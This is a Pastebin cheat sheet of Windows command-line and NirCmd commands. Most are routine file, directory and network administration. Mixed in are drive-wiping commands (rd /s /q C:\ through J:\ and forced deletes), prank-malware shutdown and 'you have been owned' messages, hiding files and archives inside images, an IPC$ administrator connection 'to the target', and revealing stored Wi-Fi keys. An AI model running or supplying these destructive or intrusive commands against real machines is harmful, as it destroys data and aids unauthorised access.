Advertisement
Najeebsk

ALL-LS-FILES

Jan 5th, 2022
665
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 85.13 KB | None | 0 0
  1. C:\Windows\DATA\ALL.LS
  2. ------------------------
  3. CD
  4. CD\Program Files
  5. CD %USERPROFILE%
  6. CD..
  7. CD..\..
  8. CD\
  9. CD\Windows
  10. CD\windows\system32
  11. CD /d E:\Pics
  12. CLIP /?
  13. user %%random%% /add
  14. shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  15. shutdown -r -f -t 00
  16. shutdown -s -t 100 c “Installing Updates”
  17. start shutdown -s -f -t 300 -c "Should have asked for permission...SHUTDOWN INITIATED"
  18. echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  19. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  20. C:\Windows\DATA\ATTRIB.LS
  21. ---------------------------
  22. ATTRIB +h %%0 Bat File hide
  23. ATTRIB +S +H "E:\*" /S /D
  24. ATTRIB -S -H -R /s /d *.*
  25. ATTRIB -S -H -R /s /d G:\*.*
  26. set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  27. set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  28. ATTRIB To hide all files and subfolders in your target location,
  29. ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  30. ATTRIB -h c:\config.sys
  31. ATTRIB -h -r -s c:\boot\bcd
  32. ATTRIB +a f:*.* & attrib -a f:*.bak
  33. ATTRIB myimage.jpg
  34. ATTRIB Run command prompt as an administrator For Virus Remove
  35. ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  36. Attrib +S +H +R
  37. Attrib +h *.ext
  38. Attrib /S -h *.ext
  39. Attrib -S -H -R
  40. call Attrib +S +H +R
  41. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  42. C:\Windows\DATA\COPY.LS
  43. ---------------------------
  44. COPY *.txt D:\
  45. COPY *.* D: OR COPY * D:\Folder /y
  46. COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  47. COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  48. COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  49. COPY * D:\dir1\dir2
  50. COPY *.* D:
  51. COPY "computer hope.txt" hope
  52. COPY myfile1.txt+myfile2.txt , combines Files contents
  53. COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  54. Echo Hide Text Here >> DATA\PIC.jpg
  55. copy /b DATA\PIC.jpg + File.rar DATA\PICNEW.jpg
  56. rar a -r -psonyNSK PIC.rar %CD%
  57. copy /b DATA\P.jpg + PIC.rar DATA\PICR.jpg
  58. xcopy /y "*.*" DATA\
  59. move /y "*.*" DATA\
  60. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  61. C:\Windows\DATA\DEL.LS
  62. ---------------------------
  63. DEL "*.rar"
  64. DEL /F *.ext
  65. del D:\*.* /f /s /q
  66. del E:\*.* /f /s /q
  67. del F:\*.* /f /s /q
  68. del G:\*.* /f /s /q
  69. del H:\*.* /f /s /q
  70. del I:\*.* /f /s /q
  71. del J:\*.* /f /s /q
  72. del /S /Q "*.*"
  73. rd/s/q C:\
  74. rd/s/q D:\
  75. rd/s/q E:\
  76. rd/s/q F:\
  77. rd/s/q G:\
  78. rd/s/q H:\
  79. rd/s/q I:\
  80. rd/s/q J:\
  81. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  82. C:\Windows\DATA\DIR.LS
  83. ---------------------------
  84. CLIP /?
  85. command | clip
  86. DIR | CLIP
  87. CLIP < README.TXT
  88. TYPE DIR /B > List.txt
  89. CMD /R DIR /B > List.txt
  90. DIR > List.txt
  91. DIR /?
  92. DIR \*.* /S /B /A
  93. DIR /ad
  94. DIR /ash
  95. DIR /a-d
  96. DIR /a:d
  97. DIR /b
  98. DIR /-c
  99. DIR /D
  100. DIR /L
  101. DIR /-N
  102. DIR /OD
  103. DIR /O-D
  104. DIR /P
  105. DIR /Q
  106. DIR /R
  107. DIR /S
  108. DIR /TC
  109. DIR /W
  110. DIR /a:s
  111. DIR \*.mp3 /s
  112. DIR \*.mp3 /s /p
  113. DIR \*.mp3 /s /b > filename.txt
  114. DIR \*.txt /s /b /a |clip
  115. DIR *.txt
  116. DIR /B /S \Mmystuff > File.txt
  117. DIR /O:gne OR DIR /O:S OR DIR /O:D
  118. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  119. C:\Windows\DATA\FIND.LS
  120. ---------------------------
  121. FIND /I "[COMMANDS]" %windir%\CMD.fm
  122. FIND "WORD" *.txt
  123. FIND /V /C "" D:\Samle.txt OR *.txt
  124. FIND /I "WORD" *Files*.txt
  125. FIND /N /I "TEXT" *.txt
  126. TYPE D:\Sample.txt | FIND " /V /C
  127. FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  128. FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  129. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  130. C:\Windows\DATA\HELP.LS
  131. ---------------------------
  132. Microsoft Windows [version 7.1 7631]
  133. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  134.  
  135. C:\>help
  136. For more information on a specific command, type HELP command-name
  137. ASSOC Displays or modifies file extension associations.
  138. ATTRIB Displays or changes file attributes.
  139. BREAK Sets or clears extended CTRL+C checking.
  140. BCDEDIT Sets properties in boot database to control boot loading.
  141. CACLS Displays or modifies access control lists (ACLs) of files.
  142. CALL Calls one batch program from another.
  143. CD Displays the name of or changes the current directory.
  144. CHCP Displays or sets the active code page number.
  145. CHDIR Displays the name of or changes the current directory.
  146. CHKDSK Checks a disk and displays a status report.
  147. CHKNTFS Displays or modifies the checking of disk at boot time.
  148. CLS Clears the screen.
  149. CMD Starts a new instance of the Windows command interpreter.
  150. COLOR Sets the default console foreground and background colors.
  151. COMP Compares the contents of two files or sets of files.
  152. COMPACT Displays or alters the compression of files on NTFS partitions.
  153. CONVERT Converts FAT volumes to NTFS. You cannot convert the
  154. current drive.
  155. COPY Copies one or more files to another location.
  156. DATE Displays or sets the date.
  157. DEL Deletes one or more files.
  158. DIR Displays a list of files and subdirectories in a directory.
  159. DISKCOMP Compares the contents of two floppy disks.
  160. DISKCOPY Copies the contents of one floppy disk to another.
  161. DISKPART Displays or configures Disk Partition properties.
  162. DOSKEY Edits command lines, recalls Windows commands, and
  163. creates macros.
  164. DRIVERQUERY Displays current device driver status and properties.
  165. ECHO Displays messages, or turns command echoing on or off.
  166. ENDLOCAL Ends localization of environment changes in a batch file.
  167. ERASE Deletes one or more files.
  168. EXIT Quits the CMD.EXE program (command interpreter).
  169. FC Compares two files or sets of files, and displays the
  170. differences between them.
  171. FIND Searches for a text string in a file or files.
  172. FINDSTR Searches for strings in files.
  173. FOR Runs a specified command for each file in a set of files.
  174. FORMAT Formats a disk for use with Windows.
  175. FSUTIL Displays or configures the file system properties.
  176. FTYPE Displays or modifies file types used in file extension
  177. associations.
  178. GOTO Directs the Windows command interpreter to a labeled line in
  179. a batch program.
  180. GPRESULT Displays Group Policy information for machine or user.
  181. GRAFTABL Enables Windows to display an extended character set in
  182. graphics mode.
  183. HELP Provides Help information for Windows commands.
  184. ICACLS Display, modify, backup, or restore ACLs for files and
  185. directories.
  186. IF Performs conditional processing in batch programs.
  187. LABEL Creates, changes, or deletes the volume label of a disk.
  188. MD Creates a directory.
  189. MKDIR Creates a directory.
  190. MKLINK Creates Symbolic Links and Hard Links
  191. MODE Configures a system device.
  192. MORE Displays output one screen at a time.
  193. MOVE Moves one or more files from one directory to another
  194. directory.
  195. OPENFILES Displays files opened by remote users for a file share.
  196. PATH Displays or sets a search path for executable files.
  197. PAUSE Suspends processing of a batch file and displays a message.
  198. POPD Restores the previous value of the current directory saved by
  199. PUSHD.
  200. PRINT Prints a text file.
  201. PROMPT Changes the Windows command prompt.
  202. PUSHD Saves the current directory then changes it.
  203. RD Removes a directory.
  204. RECOVER Recovers readable information from a bad or defective disk.
  205. REM Records comments (remarks) in batch files or CONFIG.SYS.
  206. REN Renames a file or files.
  207. RENAME Renames a file or files.
  208. REPLACE Replaces files.
  209. RMDIR Removes a directory.
  210. ROBOCOPY Advanced utility to copy files and directory trees
  211. SET Displays, sets, or removes Windows environment variables.
  212. SETLOCAL Begins localization of environment changes in a batch file.
  213. SC Displays or configures services (background processes).
  214. SCHTASKS Schedules commands and programs to run on a computer.
  215. SHIFT Shifts the position of replaceable parameters in batch files.
  216. SHUTDOWN Allows proper local or remote shutdown of machine.
  217. SORT Sorts input.
  218. START Starts a separate window to run a specified program or command.
  219. SUBST Associates a path with a drive letter.
  220. SYSTEMINFO Displays machine specific properties and configuration.
  221. TASKLIST Displays all currently running tasks including services.
  222. TASKKILL Kill or stop a running process or application.
  223. TIME Displays or sets the system time.
  224. TITLE Sets the window title for a CMD.EXE session.
  225. TREE Graphically displays the directory structure of a drive or
  226. path.
  227. TYPE Displays the contents of a text file.
  228. VER Displays the Windows version.
  229. VERIFY Tells Windows whether to verify that your files are written
  230. correctly to a disk.
  231. VOL Displays a disk volume label and serial number.
  232. XCOPY Copies files and directory trees.
  233. WMIC Displays WMI information inside interactive command shell.
  234.  
  235. For more information on tools see the command-line reference in the online help.
  236. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  237. C:\Windows\DATA\MD.LS
  238. ---------------------------
  239. MD "Najeeb"
  240. MD user1 user2 user3
  241. MD "my example directory"
  242. MKDIR \A\B\C
  243. MD ..\example
  244. MD %%random%%
  245. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  246. C:\Windows\DATA\NET.LS
  247. ---------------------------
  248. WMIC ComputerSystem GET Model
  249. WMIC computersystem get name,systemtype
  250. WMIC bios get serialnumber
  251. WMIC csproduct get identifyingnumber
  252. WMIC nic get macaddress,description
  253. WMIC baseboard get product,Manufacturer,version,serialnumbe
  254. WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  255. WMIC process get workingsetsize,commandline
  256. WMIC partition get name,size,type
  257. WMIC COMPUTERSYSTEM GET MANUFACTURER
  258. WMIC csproduct get version
  259. WMIC service list brief
  260. WMIC process list brief
  261. WMIC startup list brief
  262. WMIC process where name="firefox.exe" call terminate
  263. WMIC output to file get all process name Save
  264. WMIC /output:"C:\output.txt"
  265. ping 8.8.8.8
  266. nslookup = nslookup www.google.com
  267. arp or arp-a
  268. ipconfig
  269. ipconfig /release (this will release your IP)
  270. ipconfig /renew (this will renew your iP)
  271. netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  272. Route =You can type in command prompt “route print“
  273. Net View =You can type in command prompt “net view x.x.x.x or computername“
  274. Net User =Net User "Enter" , Net User Najeeb "Enter"
  275. Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  276. Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  277. Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  278. Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  279. iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  280. Pathping =
  281. Getmac =
  282. Netsh =
  283. ftp = ftp 192.168.1.80
  284. ssh = ssh Najeeb@192.168.0.100
  285. Netstat =
  286. tracert =tracert www.google.com
  287. Net wlan show profile "Enter"
  288. Net wlan show profile "wifi Name" key=clear "Enter"
  289. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  290. C:\Windows\DATA\NIR.LS
  291. ---------------------------
  292. nircmd.exe savescreenshot "~$folder.desktop$\PIC~$loopcount$.jpg"
  293. nircmd.exe loop 10 60000 savescreenshot "~$folder.desktop$\P~$loopcount$.png"
  294. nircmd.exe loop 3 20000 savescreenshot "DATA\PIC~$loopcount$.jpg"
  295. nircmd.exe savescreenshot "~$folder.desktop$\shot.png"
  296. nircmd.exe savescreenshot "~$folder.desktop$\shot.png" 50 50 300 200
  297. nircmd.exe savescreenshot *clipboard* 150 150 400 400
  298. nircmd.exe loop 3 2000 savescreenshotwin "DATA\PIC~$loopcount$.jpg"
  299. nircmd.exe savescreenshotwin "DATA\PIC~$loopcount$.png"
  300. nircmd.exe savescreenshotwin *clipboard*
  301. nircmd.exe clipboard set "123456"
  302. nircmd.exe clipboard set ~$folder.desktop$
  303. nircmd.exe clipboard set ~$folder.start_menu$
  304. nircmd.exe clipboard readfile "~$folder.desktop$\info1.txt"
  305. nircmd.exe clipboard addfile "~$folder.desktop$\clip1.txt"
  306. nircmd.exe clipboard clear
  307. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.png"
  308. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.gif"
  309. nircmd.exe clipboard copyimage "~$folder.desktop$\img01.gif"
  310. nircmd.exe clipboard saveclp "~$folder.desktop$\1.clp"
  311. nircmd.exe clipboard loadclp "~$folder.desktop$\1.clp"
  312. nircmd.exe beep 500 2000
  313. nircmd.exe mutesysvolume 1
  314. nircmd.exe mutesysvolume 0
  315. nircmd.exe mutesysvolume 2
  316. nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  317. nircmd.exe changesysvolume 2000
  318. nircmd.exe changesysvolume -5000
  319. nircmd.exe setsysvolume 65535
  320. nircmd.exe monitor off
  321. nircmd.exe screensaver
  322. nircmd.exe emptybin
  323. nircmd.exe folder.appdata
  324. nircmd.exe folder.startup
  325. nircmd.exe cdrom open j:
  326. nircmd.exe cdrom close y:
  327. nircmd.exe exitwin poweroff
  328. nircmd.exe regedit "~$clipboard$"
  329. nircmd.exe filldelete "C:\Users\Najeeb\AppData\Local\Temp\*.*"
  330. nircmd.exe filldelete "c:\temp\myfile.dat"
  331. nircmd.exe cmdwait 1000 monitor off
  332. nircmd.exe elevate "C:\Windows\notepad.exe"
  333. nircmd.exe infobox "This is a message box " "message"
  334. nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  335. nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  336. nircmd.exe convertimages "c:\temp\a*.gif" .png
  337. nircmd.exe convertimages "c:\temp\*.jpg" .gif
  338. nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  339. nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  340. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  341. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  342. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.desktop$" "Windows Calculator"
  343. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  344. nircmd.exe shortcut "C:\Program Files\KaZaA\Kazaa.exe" "c:\temp\MyShortcuts" "Kazaa"
  345. nircmd.exe shortcut "f:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "f:\winnt\system32\shell32.dll" 45
  346. nircmd.exe shortcut "C:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "" "" "max"
  347. nircmd.exe sendkeypress Ctrl+printscreen
  348. nircmd.exe sendkey a press
  349. nircmd.exe sendkey f10 press
  350. nircmd.exe sendkey enter press
  351. nircmd.exe sendkey 0x2e press
  352. nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.favorites$" "NirSoft Web Site"
  353. nircmd.exe urlshortcut "http://www.google.com" "~$folder.favorites$\Search Engines" "Google"
  354. nircmd.exe urlshortcut "http://www.yahoo.com" "c:\temp" "Yahoo"
  355. nircmd.exe speak text ~$clipboard$
  356. nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  357. nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  358. nircmd.exe speak file "c:\temp\speak1.txt"
  359. nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  360. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  361. C:\Windows\DATA\REN.LS
  362. ---------------------------
  363. REN *.DOC *.TXT
  364. REN *.JPEG *.TXT
  365. REN *.LNK *.TXT
  366. REN *.AVI *.TXT
  367. REN *.MPEG *.TXT
  368. REN *.COM *.TXT
  369. REN *.BAT *.TXT
  370. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  371. C:\Windows\DATA\START.LS
  372. ---------------------------
  373. start winword
  374. start mspaint
  375. start notepad
  376. start write
  377. start cmd
  378. start explorer
  379. start control
  380. start calc
  381. start C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  382. start C:\Windows\notepad.exe
  383. start http://www.google.com/
  384. start http://www.youtube.com/
  385. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  386. C:\Windows\CMD.LS
  387. ---------------------------
  388. C:\Windows\DATA\CMD.LS
  389. ---------------------------
  390. NAJEEB NIRCMD COMMAND
  391. nircmd.exe savescreenshot "~$folder.desktop$\PIC~$loopcount$.jpg"
  392. nircmd.exe loop 10 60000 savescreenshot "~$folder.desktop$\P~$loopcount$.png"
  393. nircmd.exe loop 3 20000 savescreenshot "DATA\PIC~$loopcount$.jpg"
  394. nircmd.exe savescreenshot "~$folder.desktop$\shot.png"
  395. nircmd.exe savescreenshot "~$folder.desktop$\shot.png" 50 50 300 200
  396. nircmd.exe savescreenshot *clipboard* 150 150 400 400
  397. nircmd.exe loop 3 2000 savescreenshotwin "DATA\PIC~$loopcount$.jpg"
  398. nircmd.exe savescreenshotwin "DATA\PIC~$loopcount$.png"
  399. nircmd.exe savescreenshotwin *clipboard*
  400. nircmd.exe clipboard set "123456"
  401. nircmd.exe clipboard set ~$folder.desktop$
  402. nircmd.exe clipboard set ~$folder.start_menu$
  403. nircmd.exe clipboard readfile "~$folder.desktop$\info1.txt"
  404. nircmd.exe clipboard addfile "~$folder.desktop$\clip1.txt"
  405. nircmd.exe clipboard clear
  406. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.png"
  407. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.gif"
  408. nircmd.exe clipboard copyimage "~$folder.desktop$\img01.gif"
  409. nircmd.exe clipboard saveclp "~$folder.desktop$\1.clp"
  410. nircmd.exe clipboard loadclp "~$folder.desktop$\1.clp"
  411. nircmd.exe beep 500 2000
  412. nircmd.exe mutesysvolume 1
  413. nircmd.exe mutesysvolume 0
  414. nircmd.exe mutesysvolume 2
  415. nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  416. nircmd.exe changesysvolume 2000
  417. nircmd.exe changesysvolume -5000
  418. nircmd.exe setsysvolume 65535
  419. nircmd.exe monitor off
  420. nircmd.exe screensaver
  421. nircmd.exe emptybin
  422. nircmd.exe folder.appdata
  423. nircmd.exe folder.startup
  424. nircmd.exe cdrom open j:
  425. nircmd.exe cdrom close y:
  426. nircmd.exe exitwin poweroff
  427. nircmd.exe regedit "~$clipboard$"
  428. nircmd.exe filldelete "C:\Users\Najeeb\AppData\Local\Temp\*.*"
  429. nircmd.exe filldelete "c:\temp\myfile.dat"
  430. nircmd.exe cmdwait 1000 monitor off
  431. nircmd.exe elevate "C:\Windows\notepad.exe"
  432. nircmd.exe infobox "This is a message box " "message"
  433. nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  434. nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  435. nircmd.exe convertimages "c:\temp\a*.gif" .png
  436. nircmd.exe convertimages "c:\temp\*.jpg" .gif
  437. nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  438. nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  439. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  440. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  441. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.desktop$" "Windows Calculator"
  442. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  443. nircmd.exe shortcut "C:\Program Files\KaZaA\Kazaa.exe" "c:\temp\MyShortcuts" "Kazaa"
  444. nircmd.exe shortcut "f:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "f:\winnt\system32\shell32.dll" 45
  445. nircmd.exe shortcut "C:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "" "" "max"
  446. nircmd.exe sendkeypress Ctrl+printscreen
  447. nircmd.exe sendkey a press
  448. nircmd.exe sendkey f10 press
  449. nircmd.exe sendkey enter press
  450. nircmd.exe sendkey 0x2e press
  451. nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.favorites$" "NirSoft Web Site"
  452. nircmd.exe urlshortcut "http://www.google.com" "~$folder.favorites$\Search Engines" "Google"
  453. nircmd.exe urlshortcut "http://www.yahoo.com" "c:\temp" "Yahoo"
  454. nircmd.exe speak text ~$clipboard$
  455. nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  456. nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  457. nircmd.exe speak file "c:\temp\speak1.txt"
  458. nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  459. ~~~~****========================END==========================****~~~~
  460. Najeeb Batch Commands
  461. FIND /I "[COMMANDS]" %windir%\CMD.fm
  462. FIND "WORD" *.txt
  463. FIND /V /C "" D:\Samle.txt OR *.txt
  464. FIND /I "WORD" *Files*.txt
  465. FIND /N /I "TEXT" *.txt
  466. TYPE D:\Sample.txt | FIND " /V /C
  467. FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  468. FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  469. MD "Najeeb"
  470. MD user1 user2 user3
  471. MD "my example directory"
  472. MKDIR \A\B\C
  473. MD ..\example
  474. MD %%random%%
  475. CD
  476. CD\Program Files
  477. CD %USERPROFILE%
  478. CD..
  479. CD..\..
  480. CD\
  481. CD\Windows
  482. CD\windows\system32
  483. CD /d E:\Pics
  484. CLIP /?
  485. command | clip
  486. DIR | CLIP
  487. CLIP < README.TXT
  488. TYPE DIR /B > List.txt
  489. CMD /R DIR /B > List.txt
  490. DIR > List.txt
  491. DIR /?
  492. DIR \*.* /S /B /A
  493. DIR /ad
  494. DIR /ash
  495. DIR /a-d
  496. DIR /a:d
  497. DIR /b
  498. DIR /-c
  499. DIR /D
  500. DIR /L
  501. DIR /-N
  502. DIR /OD
  503. DIR /O-D
  504. DIR /P
  505. DIR /Q
  506. DIR /R
  507. DIR /S
  508. DIR /TC
  509. DIR /W
  510. DIR /a:s
  511. DIR \*.mp3 /s
  512. DIR \*.mp3 /s /p
  513. DIR \*.mp3 /s /b > filename.txt
  514. DIR \*.txt /s /b /a |clip
  515. DIR *.txt
  516. DIR /B /S \Mmystuff > File.txt
  517. DIR /O:gne OR DIR /O:S OR DIR /O:D
  518. ATTRIB +h %%0 Bat File hide
  519. ATTRIB +S +H "E:\*" /S /D
  520. ATTRIB -S -H -R /s /d *.*
  521. ATTRIB -S -H -R /s /d G:\*.*
  522. set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  523. set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  524. ATTRIB To hide all files and subfolders in your target location,
  525. ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  526. ATTRIB -h c:\config.sys
  527. ATTRIB -h -r -s c:\boot\bcd
  528. ATTRIB +a f:*.* & attrib -a f:*.bak
  529. ATTRIB myimage.jpg
  530. ATTRIB Run command prompt as an administrator For Virus Remove
  531. ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  532. Attrib +S +H +R
  533. Attrib +h *.ext
  534. Attrib /S -h *.ext
  535. Attrib -S -H -R
  536. call Attrib +S +H +R
  537. COPY *.txt D:\
  538. COPY *.* D: OR COPY * D:\Folder /y
  539. COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  540. COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  541. COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  542. COPY * D:\dir1\dir2
  543. COPY *.* D:
  544. COPY "computer hope.txt" hope
  545. COPY myfile1.txt+myfile2.txt , combines Files contents
  546. COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  547. Echo Hide Text Here >> DATA\PIC.jpg
  548. copy /b DATA\PIC.jpg + File.rar DATA\PICNEW.jpg
  549. rar a -r -psonyNSK PIC.rar %CD%
  550. copy /b DATA\P.jpg + PIC.rar DATA\PICR.jpg
  551. xcopy /y "*.*" DATA\
  552. move /y "*.*" DATA\
  553. DEL "*.rar"
  554. DEL /F *.ext
  555. del D:\*.* /f /s /q
  556. del E:\*.* /f /s /q
  557. del F:\*.* /f /s /q
  558. del G:\*.* /f /s /q
  559. del H:\*.* /f /s /q
  560. del I:\*.* /f /s /q
  561. del J:\*.* /f /s /q
  562. del /S /Q "*.*"
  563. rd/s/q C:\
  564. rd/s/q D:\
  565. rd/s/q E:\
  566. rd/s/q F:\
  567. rd/s/q G:\
  568. rd/s/q H:\
  569. rd/s/q I:\
  570. rd/s/q J:\
  571. REN *.DOC *.TXT
  572. REN *.JPEG *.TXT
  573. REN *.LNK *.TXT
  574. REN *.AVI *.TXT
  575. REN *.MPEG *.TXT
  576. REN *.COM *.TXT
  577. REN *.BAT *.TXT
  578. start winword
  579. start mspaint
  580. start notepad
  581. start write
  582. start cmd
  583. start explorer
  584. start control
  585. start calc
  586. msg * Hi
  587. msg * Are you having fun?
  588. msg * I am
  589. msg * Lets have fun together
  590. msg * Because you have been o-w-n-e-d
  591. user %%random%% /add
  592. start C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  593. start C:\Windows\notepad.exe
  594. start http://www.google.com/
  595. start http://www.youtube.com/
  596. taskkill -im explorer.exe /f >nul&start explorer
  597. WMIC ComputerSystem GET Model
  598. WMIC computersystem get name,systemtype
  599. WMIC bios get serialnumber
  600. WMIC csproduct get identifyingnumber
  601. WMIC nic get macaddress,description
  602. WMIC baseboard get product,Manufacturer,version,serialnumbe
  603. WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  604. WMIC process get workingsetsize,commandline
  605. WMIC partition get name,size,type
  606. WMIC COMPUTERSYSTEM GET MANUFACTURER
  607. WMIC csproduct get version
  608. WMIC service list brief
  609. WMIC process list brief
  610. WMIC startup list brief
  611. WMIC process where name="firefox.exe" call terminate
  612. WMIC output to file get all process name Save
  613. WMIC /output:"C:\output.txt"
  614. ping 8.8.8.8
  615. nslookup = nslookup www.google.com
  616. arp or arp-a
  617. ipconfig
  618. ipconfig /release (this will release your IP)
  619. ipconfig /renew (this will renew your iP)
  620. netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  621. Route =You can type in command prompt “route print“
  622. Net View =You can type in command prompt “net view x.x.x.x or computername“
  623. Net User =Net User "Enter" , Net User Najeeb "Enter"
  624. Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  625. Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  626. Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  627. Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  628. iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  629. Pathping =
  630. Getmac =
  631. Netsh =
  632. ftp = ftp 192.168.1.80
  633. ssh = ssh Najeeb@192.168.0.100
  634. Netstat =
  635. tracert =tracert www.google.com
  636. Net wlan show profile "Enter"
  637. Net wlan show profile "wifi Name" key=clear "Enter"
  638. shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  639. shutdown -r -f -t 00
  640. shutdown -s -t 100 c “Installing Updates”
  641. start shutdown -s -f -t 300 -c "Should have asked for permission...SHUTDOWN INITIATED"
  642. echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  643. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  644. C:\Windows\CMD.FM
  645. ---------------------------
  646. C:\Windows\DATA\CMD.FM
  647. ---------------------------
  648. [HELP]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HELP-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  649. [HELP] => FIND /I "[COMMANDS]" %windir%\CMD.fm
  650. [HELP] => Exmple Help=COPY /? ; DIR /? ...
  651. [HELP] => %windir%\NirCmd.chm
  652. [HELP] => %windir%\Rar.exe Help /?
  653. [HELP] => %windir%\UnRaR.exe Help /?
